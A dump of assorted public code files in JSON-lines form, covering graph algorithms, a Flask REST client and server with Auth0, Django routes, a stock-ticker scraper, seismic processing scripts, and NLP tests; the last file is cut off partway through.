+{"seq_id":"24012731324","text":"nodes = (1,2,3,4,5,6,7,8,9)\nedges = [(1,4),(7,1),(4,7),(9,7), (9,3), (3,6), (6,9),(8,6),(8,5),(5,2),(2,8)]\n\ndef reverse_graph(edges):\n    rev = [(e[1],e[0]) for e in edges]\n    return rev\n\n\ndef call_1st_loop(nodes, edges):\n    edges = reverse_graph(edges)\n    order = dfs_loop(nodes,edges)\n    return order\n    \ndef call_2nd_loop(order, edges):\n    explored = set()\n    curr_s = None\n    lead_comp = {}\n    for ft in range(len(nodes), 0, -1):\n        i = order[ft]\n        if i not in explored:\n            curr_s = i\n            explored = dfs_lead(edges, curr_s, i, explored, lead_comp)\n    return lead_comp\n\n\n\ndef dfs_loop(nodes,edges):\n    ft_node = {}\n    finish_t = 0\n    explored = set()\n    curr_s = None\n    for i in range(len(nodes), 0, -1):\n        if i not in explored:\n            curr_s = i\n            finish_t, explored = dfs(nodes,edges, finish_t, curr_s, i, explored, ft_node)\n            \n    return ft_node\n    \n    \ndef dfs(nodes,edges, finish_t, curr_s, node_i, 
explored,ft_node):\n    explored.add(node_i)\n    leader = curr_s\n    el_edges = [e for e in edges if e[0] == node_i]\n    for edge in el_edges:\n        v = edge[1]\n        if v not in explored:\n            finish_t, explored = dfs(nodes,edges, finish_t,leader, v, explored, ft_node)\n    finish_t = finish_t + 1\n    #print(\"finish time of node %s is %s\" % (node_i,finish_t))\n    ft_node[finish_t] = node_i\n    #print(\"leader of %s node is %s\" % (node_i, leader))\n    return finish_t, explored\n\ndef dfs_lead(edges, curr_s, node_i,explored,lead_comp):\n    explored.add(node_i)\n    leader = curr_s\n    el_edges = [e for e in edges if e[0] == node_i]\n    for edge in el_edges:\n        v = edge[1]\n        if v not in explored:\n            explored = dfs_lead(edges, leader, v, explored, lead_comp)\n    if leader not in lead_comp:\n        lead_comp.setdefault(leader,[]) \n    lead_comp[leader].append(node_i)\n    return explored\n    \n    \norder = call_1st_loop(nodes, edges)\nprint(call_2nd_loop(order, edges))\n    \n    \n\n","repo_name":"liu1992yang/algorithm_class_hw","sub_path":"scc_test.py","file_name":"scc_test.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22803630206","text":"import itertools\n\ndef prime_numbers():\n    # Handle the first prime\n    yield 2\n    prime_cache = [2] # Cache of primes\n\n    # Loop over positive, odd integers\n    for n in itertools.count(3, 2):\n        is_prime = True\n\n        # Check to see if any prime number divides n\n        for p in prime_cache:\n            if n % p == 0: # p divides n evenly\n                is_prime = False\n                break\n\n        # is it prime?\n        if is_prime:\n            prime_cache.append(n)\n            yield n\n\nfor p in prime_numbers():\n    print(p)\n    if p > 100:\n        break\n    ","repo_name":"eddy-di/learning_python","sub_path":"stepik_examples/generators_learning.py","file_name":"generators_learning.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38258236864","text":"# coding=utf-8\n'''*****************************************************\n* Author: Steven Alves *\n* Universidade: UniMindelo *\n* UC: WebServices *\n* Git-Hub: https://github.com/xredocx215sevlanevets *\n* Last-Update: 12/01/2020 *\n* Cliente: Python3.7 *\n*****************************************************'''\n\nimport requests\nimport json\nimport sys\n\n# Cabeçalhos HTTP\nheader = {\n    'user-agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n    'Content-type': 'application/json'\n}\n\n\n# Programa Principal\ndef Main():\n    while True:\n        print(\"\")\n        print(\"Digite 'Control + C' para sair do programa\")\n        print(\"\")\n        PrintMenu()\n        escolha = input(\"Escolha: \")\n        if escolha == \"1\":\n            getItems()\n        elif escolha == \"2\":\n            nome_item = input(\"Nome do item a recuperar: \")\n            getItem(nome_item)\n        elif escolha == \"3\":\n            nome_item = input(\"Nome do item a enviar: \")\n            preco_item = input(\"Preco do item a enviar: \")\n            postItem(nome_item, preco_item)\n        elif escolha == \"4\":\n            nome_item = input(\"Nome do item a deletar: \")\n            deleteItem(nome_item)\n        elif escolha == \"5\":\n            nome_item = input(\"Nome do item a alterar/criar: \")\n            putItem(nome_item)\n        else:\n            print(\"Escolha inválida\")\n        print(\"-\"*50)\n\n\n# Mostra as Opções de Menu\ndef PrintMenu():\n    print(\"1 - Para obter todos os items\")\n    print(\"2 - Para obter um item\")\n    print(\"3 - Para cadastrar um item\")\n    print(\"4 - Para deletar um item\")\n    print(\"5 - Para Atualizar ou criar um item (se nao existir)\")\n\n\n# Requisição GET\ndef 
getItems():\n    print(\"[+] Obtendo todos os items...\")\n    url = 'http://127.0.0.1:5000/items'\n    try:\n        requisicao = requests.get(url, headers=header)\n    except Exception as err:\n        print('[-] Erro Na Requisição: ', err)\n\n    requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n    print(\"\")\n    print(requisicao_json)\n\n\n# Requisição GET\ndef getItem(nome_item):\n    print(\"[+] Obtendo item...\")\n    url = 'http://127.0.0.1:5000/item/'+nome_item\n    try:\n        requisicao = requests.get(url, headers=header)\n    except Exception as err:\n        print('[-] Erro Na Requisição: ', err)\n\n    requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n    print(\"\")\n    print(requisicao_json)\n\n\n# Requisição POST\ndef postItem(nome_item, preco_item):\n    print(\"[+] Enviando item...\")\n    url = 'http://127.0.0.1:5000/item/'+nome_item\n    if preco_item:\n        data ={\"preco\" : float(preco_item)}\n    else:\n        data ={\"preco\" : 00.00}\n    try:\n        requisicao = requests.post(url, data=json.dumps(data), headers=header)\n    except Exception as err:\n        print('[-] Erro Na Requisição: ', err)\n\n    requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n    print(\"\")\n    print(requisicao_json)\n\n\n# Requisição DEL\ndef deleteItem(nome_item):\n    print(\"\")\n    print(\"[+] Deletando item...\")\n    pass\n\n\n# Requisição PUT\ndef putItem(nome_item):\n    print(\"\")\n    print(\"[+] Alterando/criando item...\")\n    pass\n\n\nif __name__ == \"__main__\":\n    try:\n        Main()\n    except KeyboardInterrupt:\n        print('\\n[!] Error: Cliente Interrompeu o Programa!')\n        sys.exit(1)\n","repo_name":"Steven-J-Alves/python-flask-api","sub_path":"Cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71476059820","text":"\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('choice/', views.choice, name='choice'),\n path('cube/', views.cube, name='cube'),\n path('rand100/', views.rand100, name='rand100'),\n path('articles/<int:author_id>', views.get_articles, name='articles'),\n path('article/<int:article_id>', views.get_article, name='article'),\n path('game/', views.game, name='game'),\n path('addauthor/', views.add_author, name='addauthor'),\n path('addarticle/', views.add_article, name='addarticle'),\n path('article_with_comment/<int:article_id>', views.comment_form, name='article_with_comment'),\n]","repo_name":"Pisarev82/Study_Django","sub_path":"seminars/seminars_project/_2_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42189822785","text":"# -*- coding: utf-8 -*-\n#\n# Get the stock quotes\n\nimport os\nimport string\n\nimport pandas as pd\nimport scrapy\n\n\nclass QuotesSpiderI3Investor(scrapy.Spider):\n name = \"quotes_i3investor\"\n\n _URL_BASE = 'https://klse.i3investor.com/jsp/stocks.jsp?g=S&m=int&s=%s'\n _TICKER_FILE = \"KLSE_i3investor.csv\"\n\n def _chunks(self, l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n def start_requests(self):\n urls = []\n urls.append(self._URL_BASE % '0')\n for c in string.ascii_uppercase:\n urls.append(self._URL_BASE % c)\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n \"\"\"Extract the symbol and the name into a list\"\"\"\n\n if (os.path.exists(self._TICKER_FILE)):\n df_symbols = pd.read_csv(self._TICKER_FILE, dtype=str)\n df_symbols.set_index(['symbol'])\n else:\n df_symbols = pd.DataFrame()\n\n stock_listing = response.css('.left a::text').extract()\n stock_listing = list(self._chunks(stock_listing, 2))\n\n stock_urls = response.css('.left a[href]:link').extract()\n stock_urls = list(self._chunks(stock_urls, 2))\n\n for idx, stock in enumerate(stock_listing):\n stock.append(stock_urls[idx][0].split('/')[3].split('.')[0])\n\n #print('-----------------------')\n #pprint(stock_listing)\n\n df = pd.DataFrame(stock_listing, columns=[\"symbol\", \"name\", \"code\"])\n df.set_index(['symbol'])\n\n if (df_symbols.empty):\n df_symbols = df\n else:\n # print(df)\n df_symbols = df_symbols.append(df)\n\n df_symbols.to_csv(self._TICKER_FILE, encoding='utf-8', index=False)\n","repo_name":"mengwangk/ai-playground","sub_path":"source/scrapy/klse/klse/spiders/quotes_i3investor.py","file_name":"quotes_i3investor.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"97"} +{"seq_id":"5439895481","text":"from xlwt.Workbook import *\nfrom xlwt.Style import *\n\t\ndef process_file(fil):\n\tques = ''\n\tquestions = []\n\tfor n in range(0,101):\n\t\ttemp = str(n+1) + '.'\n\t\twhile temp not in ques:\n\t\t\tques = ques + fil.read(1)\n\t\tquestions.append(ques[:len(ques)-len(temp)])\n\t\tques = ''\n\t\tfil.seek(fil.tell()-len(temp))\n\treturn questions\n\t\n\ndef process_question(quest):\n\tfor cnt in range(0,len(quest)):\n\t\ttemp = quest[cnt].replace('\\n','')\n\t\ttemp = temp.replace('\\x0c','')\n\t\tquest[cnt] = temp\n\tmaster = []\n\tfor qu in quest:\n\t\ttemp = splice_line(qu)\n\t\tmaster += temp,\n\treturn master\n\ndef insert_into_excel(processed_list, ):\n\twb = Workbook()\n\tws0 = 
wb.add_sheet('DECAProj')\n\tws0.write(0,0,'Question')\n\tws0.write(0,1,'Answer Choice 1')\n\tws0.write(0,2,'Answer Choice 2')\n\tws0.write(0,3,'Answer Choice 3')\n\tws0.write(0,4,'Answer Choice 4')\n\tfor row in range(1,len(processed_list)):\n\t\tfor col in range(0,len(processed_list[row])):\n\t\t\tws0.write(row,col,str(processed_list[row][col]))\n\treturn wb\n\n\ndef splice_line(q):\n\ttemp = []\n\tdic = {}\n\tsplitList = ['A.','B.','C.','D.']\n\tfor ch in splitList:\n\t\tif ch in q:\n\t\t\tif ch == 'A.':\n\t\t\t\tdic[q.find(ch)] = 'A.'\n\t\t\telif ch =='B.':\n\t\t\t\tdic[q.find(ch)] = 'B.'\n\t\t\telif ch == 'C.':\n\t\t\t\tdic[q.find(ch)] = 'C.'\n\t\t\telif ch == 'D.':\n\t\t\t\tdic[q.find(ch)]= 'D.'\n\t\t\telse:\n\t\t\t\tpass\n\tsort_list = sorted(dic)\n\tsort_list += len(q),\n\tstart = 0\n\tfor end in sort_list:\n\t\ttemp += q[start:end].strip(),\n\t\tstart = end\n\ttemp = order_list(temp)\n\treturn temp\n\t\t\ndef order_list(lst):\n\ttemp = []\n\ttempString = lst[0]\n\ttemp += tempString[tempString.find('.')+1:],\n\tdic = {}\n\tcount = 0\n\tfor i in range(1,len(lst)):\n\t\tif lst[i][:2] == 'A.':\n\t\t\tdic[1] = i\n\t\telif lst[i][:2] == 'B.':\n\t\t\tdic[2] = i\n\t\telif lst[i][:2] == 'C.':\n\t\t\tdic[3] = i\n\t\telif lst[i][:2] == 'D.':\n\t\t\tdic[4] = i\n\t\telse:\n\t\t\tpass\t\n\tfor j in dic:\n\t\ttemp += lst[dic[j]],\n\treturn temp","repo_name":"niharpatil/DECATestToExcel","sub_path":"DECA Test Conversion/ReadTests.py","file_name":"ReadTests.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"25132686116","text":"from rsf.proj import *\n\nFetch('elf-stk2.rsf','masha')\nFlow('data','elf-stk2.rsf','dd form=native | put o1=0')\n\ndef grey(title):\n    return '''\n    window n1=751 |\n    grey pclip=99 title=\"%s\" label2=\" \" crowd=0.85\n    ''' % title\n\ndef zoom(title):\n    return '''\n    window min1=0.81 max1=1.60 min2=4800 max2=7600 |\n    grey pclip=99 title=\"%s\" label2=\" \" crowd=0.8 grid=y\n    ''' % title\n\nPlot('data',grey('(a) DMO-stack data'))\n\nFlow('fk','data','cosft sign2=1')\nFlow('stolt','fk','stolt vel=2000 pad=2049 minstr=0.5 | cosft sign2=-1')\n\nPlot('stolt',grey('(b) Stolt migration (v0 = 2000 m/s)'))\n\nFetch('vsmooth_levset.dat','masha')\n\nnx=1000\ndx=13.3333\n\nnz=1000\ndz=5.005\n\nFlow('vel','vsmooth_levset.dat',\n     '''\n     echo in=$SOURCE\n     n1=%d o1=0 d1=%g\n     n2=%d o2=0 d2=%g\n     label1=Lateral unit1=m\n     label2=Depth unit2=m\n     label=Velocity unit=\"km/s\"\n     data_format=ascii_float |\n     dd form=native |\n     transp \n     ''' % (nx,dx,nz,dz),stdin=0)\n\nFlow('vt','vel','depth2time velocity=$SOURCE nt=800 dt=0.004 t0=0')\nFlow('bot','vt','window n1=1 f1=650 | spray axis=1 n=150')\nFlow('vt2','vt bot','window n1=650 | cat axis=1 ${SOURCES[1]}')\nFlow('vt1','vt2','stack | spray axis=2 n=1000 d=13.3333 o=0')\n\nv0 = 1800\n\nFlow('str','data vt1',\n     'stoltstretch velocity=${SOURCES[1]} vel=%g pad=1250' % v0)\nFlow('stfk','str','cosft sign2=1')\n\npar = {\n    'good': '',\n    'bad': 'stretch=0.5'\n    }\n\nfor case in list(par.keys()):\n    stolt = 'stolt-'+case\n    Flow(stolt,'stfk vt1',\n         '''\n         stolt vel=%g pad=2049 minstr=0.5 %s |\n         cosft sign2=-1 |\n         stoltstretch velocity=${SOURCES[1]} vel=%g inv=y\n         ''' % (v0,par[case],v0))\n    \nPlot('stolt-bad',grey('(c) Stolt-stretch migration (W=0.5)'))\nPlot('stolt-bad-zoom','stolt-bad',\n     zoom('(c) Stolt-stretch migration (W=0.5)'))\nPlot('stolt-good',grey('(a) Stolt-stretch migration (optimal W)'))\nPlot('stolt-good-zoom','stolt-good',\n     zoom('(a) Stolt-stretch 
migration (optimal W)'))\n\nFlow('pshift','fk vt1',\n 'gazdag velocity=${SOURCES[1]} pad=2048 | cosft sign2=-1')\nPlot('pshift',grey('(b) Phase-shift migration'))\nPlot('pshift-zoom','pshift',\n zoom('(b) Phase-shift migration'))\n\nntcut = [0,125,275,350,400,800]\nvref = [1949,1678,1751,1377,627.9]\nncut = len(ntcut)-1\n\nFlow('casc','vt1','cascade ncut=%d ntcut=%s' % \n (ncut-1,','.join(map(str,ntcut[1:ncut]))))\n\nFlow('casc2','vt1','cascade ncut=2 ntcut=200,400')\n\nPlot('vt1',\n '''\n window n2=1 n1=751 | graph crowd=0.8\n transp=y yreverse=y xinch=7 titlesz=14 labelsz=10 \n title=\"(a)\" label1=Time unit1=s label2=Velocity unit2=m/s\n wheretitle=b wherexlabel=t\n ''')\n\nfor case in ('casc','casc2'):\n Plot(case,['vt1',case],\n '''\n transp plane=23 |\n cat axis=2 ${SOURCES[1]} |\n window n3=1 n1=751 | graph crowd=0.8\n transp=y yreverse=y titlesz=14 labelsz=10 \n title=\"(%c)\" label1=Time unit1=s label2=Velocity unit2=m/s\n wheretitle=b wherexlabel=t dash=0,1,2,3,4,5\n ''' % 'bc'[case=='casc'])\n\nResult('velocities','vt1 casc2 casc','SideBySideAniso')\n\ndata = 'data'\nwins = []\nmigs = []\n\nfor ic in range(ncut):\n # migrate\n migr = 'migr%d' % ic\n vel = 'vel%d' % ic\n v0 = vref[ic]\n \n Flow(vel,'casc','window n2=1 f2=%d' % ic)\n Flow(migr,[data,vel],\n '''\n stoltstretch velocity=${SOURCES[1]} vel=%g pad=1250 |\n cosft sign2=1 |\n stolt vel=%g pad=2049 minstr=0.5 |\n cosft sign2=-1 |\n stoltstretch velocity=${SOURCES[1]} vel=%g inv=y\n ''' % (v0,v0,v0))\n migs.append(migr)\n data = migr\n\n # window\n wind = 'wind%d' % ic\n wins.append(wind)\n Flow(wind,'data',\n 'math output=%d | window f1=%d n1=%d' % \n (ic,ntcut[ic],ntcut[ic+1]-ntcut[ic]))\n\nFlow('slice',wins,\n '''\n cat axis=1 ${SOURCES[1:%d]} | \n math output=input-0.01 | \n smooth rect1=50\n ''' % ncut)\nFlow('cmig',migs+['slice'],\n '''\n cat ${SOURCES[1:%d]} |\n put o3=0 d3=1 |\n transp plane=23 |\n slice pick=${SOURCES[%d]} |\n window\n ''' % (ncut,ncut))\n\nPlot('cmig',grey('(c) Cascaded Stolt-Stretch (%d velocities)' % ncut))\nPlot('cmig-zoom','cmig',\n zoom('(d) Cascaded Stolt-Stretch (%d velocities)' % ncut))\n\nResult('data-stolt-ststr','data stolt stolt-bad','OverUnderAniso',\n vppen='xscale=1.7')\n\nResult('data-ststr-pshift-casc','stolt-good pshift cmig','OverUnderAniso',\n vppen='xscale=1.7')\n\nResult('dip-zoom','stolt-good-zoom pshift-zoom stolt-bad-zoom cmig-zoom',\n 'TwoRows')\n\nEnd()\n","repo_name":"ahay/src","sub_path":"book/sep/stoltst/elfst/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"97"} +{"seq_id":"2714252937","text":"#!/usr/bin/env python3\n\nimport unittest\nimport options\n\nimport framenetreader\nfrom framenetparsedreader import FNParsedReader\n \nclass FNParsedReaderTest(unittest.TestCase):\n def comp(self, original, parsed):\n return all(\n [x == y or y == \"<num>\" for x,y in zip(original.split(), parsed.split())]\n )\n\n def test_sentences_match(self, num_sample = 0):\n\n # List of sentences and files for which the test would fail because of\n # mistakes in the parser output\n\n bad_files = [\"ANC__110CYL\", \"ANC__HistoryOfJerusalem\",\n \"ANC__HistoryOfLasVegas\", \"ANC__WhereToHongKong\",\n \"C-4__C-4Text.xml\", \"KBEval\", \"LUCorpus-v0.3\", \"NTI\",\n \"PropBank__BellRinging\", \"PropBank__LomaPrieta\",\n \"IranRelatedQuestions\"]\n\n bad_sentences = [(\"Miscellaneous__SadatAssassination.xml\", 0),\n (\"PropBank__AetnaLifeAndCasualty.xml\", 0),\n 
(\"PropBank__ElectionVictory.xml\", 0),\n (\"PropBank__TicketSplitting.xml\", 0),\n (\"SemAnno__Text1.xml\", 3)]\n\n\n parsed_reader = FNParsedReader()\n\n for annotation, parse in zip(options.fulltext_annotations, options.fulltext_parses):\n # Skip unwanted files\n if any([annotation.match('*{}*'.format(bad_file)) for bad_file in bad_files]):\n continue\n\n reader = framenetreader.FulltextReader(annotation, False)\n previous_sentence = 0\n\n for frame in reader.frames:\n # don't test bad sentences in files\n if any(annotation.match(bad_annotation) and bad_sentence_id == frame.sentence_id\n for bad_annotation, bad_sentence_id in bad_sentences):\n continue\n\n # find the correct sentence\n if frame.sentence_id != previous_sentence:\n for sentence_id, builder_sentence, tree in parsed_reader.sentence_trees(parse):\n if sentence_id == frame.sentence_id:\n sentence = tree.flat()\n self.assertEqual(builder_sentence, sentence)\n previous_sentence = frame.sentence_id\n\n # test the sentence\n self.assertTrue(self.comp(frame.sentence, sentence))\n","repo_name":"aymara/knowledgesrl","sub_path":"tests/test_framenetparsedreader.py","file_name":"test_framenetparsedreader.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"97"} +{"seq_id":"16528454728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 1 13:36:09 2022\n\n@author: masullo\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.close('all')\n\npath = 'fi2_pick_clusters/'\n\nfname_cluster = {}\n\nfname_cluster['R1'] = 'R1_7nt_150pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R2'] = 'R2_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R3'] = 'R3_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R4'] = 'R4_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\npx_size = 130 # nm\n\nlocs_c_x = {}\nlocs_c_y = {}\nlocs_c_z = {}\n\ndisplay_xlocs_c = {}\ndisplay_ylocs_c = {}\ndisplay_zlocs_c = {}\n\nfor i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n my_df_cluster = pd.read_hdf(path + fname_cluster[ch], key='locs') \n \n my_df_cluster.x = my_df_cluster.x * px_size\n my_df_cluster.y = my_df_cluster.y * px_size\n \n locs_c_x[ch] = my_df_cluster.x\n locs_c_y[ch] = my_df_cluster.y\n locs_c_z[ch] = my_df_cluster.z\n\nplt.style.use('dark_background')\n# fig, ax = plt.subplots()\n# ax.set_aspect('equal')\n \ncolors = ['#CC99C9', '#9EC1CF', '#9EE09E', '#FEB144'] # purple, blue, green, orange\ndisplay3d = False\n\n# if display3d:\n \n# #TODO: fix 3D visualization\n \n# for i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n# ax = fig.add_subplot(projection='3d')\n \n# xmin, xmax = 30000, 34000\n# ymin, ymax = 33000, 37000\n# roi = (locs_nc_y[ch] > ymin) & (locs_nc_y[ch] < ymax) & (locs_nc_x[ch] > xmin) & (locs_nc_x[ch] < xmax)\n \n# display_xlocs_nc[ch] = locs_nc_x[ch][roi]\n# # display_xlocs_c[ch] = locs_c_x[ch][roi]\n\n# display_ylocs_nc[ch] = locs_nc_y[ch][roi]\n# # display_ylocs_c[ch] = locs_c_y[ch][roi]\n \n# display_zlocs_nc[ch] = locs_nc_z[ch][roi]\n# # display_zlocs_c[ch] = locs_c_z[ch][roi]\n\n \n# ax.scatter(display_xlocs_nc[ch], display_ylocs_nc[ch], display_zlocs_nc[ch], color=colors[i], 
edgecolors='white', alpha=0.3)\n# # ax.scatter(display_xlocs_c[ch], display_ylocs_c[ch], display_zlocs_c[ch], color=colors[i], edgecolors='white')\n# # ax.set_xlim(32000, 33000)\n# # ax.set_ylim(35000, 36000)\n \n# else:\n\nfor i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n plt.style.use('dark_background')\n fig, ax = plt.subplots()\n ax.set_aspect('equal')\n \n zmin = locs_c_z[ch].min()\n \n locs_c_z[ch] = locs_c_z[ch] - zmin\n \n zmax = locs_c_z[ch].max()\n \n print(zmin, zmax)\n \n for j, (x, y, z) in enumerate(zip(locs_c_x[ch], locs_c_y[ch], locs_c_z[ch])):\n \n \n ax.scatter(x, y, color=colors[i], edgecolors='white', alpha=z/zmax)\n \n # ax.scatter(locs_c_x[ch], locs_c_y[ch], color=colors[i], edgecolors='white')\n ax.set_xlim(32684, 32842)\n ax.set_ylim(38487, 38659)","repo_name":"jungmannlab/resi","sub_path":"Plotting_Figures/Figure 2/npc_labelling_clustered_only.py","file_name":"npc_labelling_clustered_only.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"12065128797","text":"from flask import Flask, jsonify, request, abort, render_template, redirect, url_for\nfrom auth.auth import requires_auth, AuthError\nfrom models import setup_db, Actor, Movie\nfrom flask_cors import CORS\nimport os\nfrom jose import jwt\n\n\nAUTH0_DOMAIN = os.getenv('AUTH0_DOMAIN')\nAPI_AUDIENCE = os.getenv('API_AUDIENCE')\nAUTH_CLIENT_ID = os.getenv('AUTH_CLIENT_ID')\n\n\nRESULTS_PER_PAGE = 10\n\n# App configuration\n\n\ndef create_app(test_config=None):\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PUT,POST,DELETE,OPTIONS')\n return response\n\n # routes\n @app.route('/')\n def index():\n login_uri = 'https://{}/authorize?audience={}&response_type=token&client_id={}&redirect_uri={}'.format(\n AUTH0_DOMAIN, API_AUDIENCE, AUTH_CLIENT_ID, 'http://localhost:5000/')\n \n return render_template('index.html', login_url = login_uri)\n\n\n # Pagination of restuls\n\n def paginate_results(request, data):\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * RESULTS_PER_PAGE\n end = start + RESULTS_PER_PAGE\n\n actors = [actor.format() for actor in data]\n paginated_results = actors[start:end]\n\n return paginated_results\n\n # routes\n # TODO: get_actors : DONE\n\n @app.route('/actors', methods=['GET'])\n @requires_auth('get:actors')\n def get_actors(jwt):\n try:\n actors = Actor.query.order_by(Actor.id).all()\n paginated_actors = paginate_results(request, actors)\n if actors:\n return jsonify({\n 'success': True,\n 'actors': paginated_actors,\n 'total_actors': len(actors)\n })\n else:\n return jsonify({\n 'success': True,\n 'message': 'no actor found'\n })\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: post_actors : Done\n @app.route('/actors', methods=['POST'])\n @requires_auth('post:actors')\n def create_actor(jwt):\n body = request.get_json()\n name = body.get('name', None)\n age = body.get('age', None)\n gender = body.get('gender', None)\n movie_id = body.get('movie_id', None)\n \n try:\n if body is not None:\n actor = Actor(\n name=name,\n gender=gender,\n age=age,\n movie_id=movie_id)\n actor.insert()\n\n return jsonify({\n 'success': True,\n 'created': actor.id\n })\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: delete_actors : Done\n 
@app.route('/actors/<int:actor_id>', methods=['DELETE'])\n @requires_auth('delete:actors')\n def delete_actor(jwt, actor_id):\n actor = Actor.query.filter(Actor.id == actor_id).one_or_none()\n print(actor)\n \n try: \n actor.delete()\n return jsonify({\n 'success': True,\n 'deleted': actor_id\n })\n \n except Exception as e:\n print(e)\n if actor is None:\n abort(404)\n abort(422)\n\n # TODO: patch_actors : Done\n @app.route('/actors/<int:actor_id>', methods=['PATCH'])\n @requires_auth('patch:actors')\n def update_actor(jwt, actor_id):\n body = request.get_json()\n name = body.get('name', None)\n age = body.get('age', None)\n gender = body.get('gender', None)\n movie_id = body.get('movie_id', None)\n\n try:\n actor = Actor.query.filter(Actor.id == actor_id).one_or_none()\n actor.name = name\n actor.age = age\n actor.gender = gender\n actor.movie_id = movie_id\n actor.update()\n\n return jsonify({\n 'success': True,\n 'updated': actor.id\n })\n\n except Exception as e:\n print(e)\n if actor is None:\n abort(404)\n abort(422)\n\n # routes\n # TODO: get_movies : DONE\n @app.route('/movies', methods=['GET'])\n @requires_auth('get:movies')\n def get_movies(jwt):\n try:\n movies = Movie.query.order_by(Movie.id).all()\n paginated_movies = paginate_results(request, movies)\n \n if movies:\n return jsonify({\n 'success': True,\n 'movies': paginated_movies,\n 'total_movies': len(movies)\n })\n else:\n return jsonify({\n 'success': True,\n 'message': 'no movies found',\n 'total_movies': len(movies)\n })\n \n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: post_movies : DONE\n\n @app.route('/movies', methods=['POST'])\n @requires_auth('post:movies')\n def create_movie(jwt):\n body = request.get_json()\n title = body.get('title', None)\n release = body.get('release_date', None)\n try:\n if body is not None:\n movie = Movie(title=title, release_date=release)\n movie.insert()\n return jsonify({\n 'success': True,\n 'created': movie.id\n })\n\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: delete_movies : DONE\n\n @app.route('/movies/<int:movie_id>', methods=['DELETE'])\n @requires_auth('delete:movies')\n def delete_movie(jwt, movie_id):\n movie = Movie.query.filter(Movie.id == movie_id).one_or_none()\n print(movie)\n try:\n movie.delete()\n return jsonify({\n 'success': True,\n 'deleted': movie_id\n })\n\n except Exception as e:\n print(e)\n if movie is None:\n abort(404)\n abort(422)\n\n # TODO: patch_movies : Done\n @app.route('/movies/<int:movie_id>', methods=['PATCH'])\n @requires_auth('patch:movies')\n def update_movie(jwt, movie_id):\n\n body = request.get_json()\n title = body.get('title', None)\n release = body.get('release_date', None)\n\n try:\n if body is not None:\n movie = Movie.query.filter(Movie.id == movie_id).one_or_none()\n movie.title = title\n movie.release_date = release\n\n movie.update()\n\n return jsonify({\n 'success': True,\n 'updated': movie.id\n })\n\n except Exception as e:\n print(e)\n if movie is None:\n abort(404)\n abort(422)\n\n # Error handlers\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'not found'\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'unprocessable'\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'bad request'\n }), 400\n\n @app.errorhandler(401)\n def bad_request(error):\n return jsonify({\n 
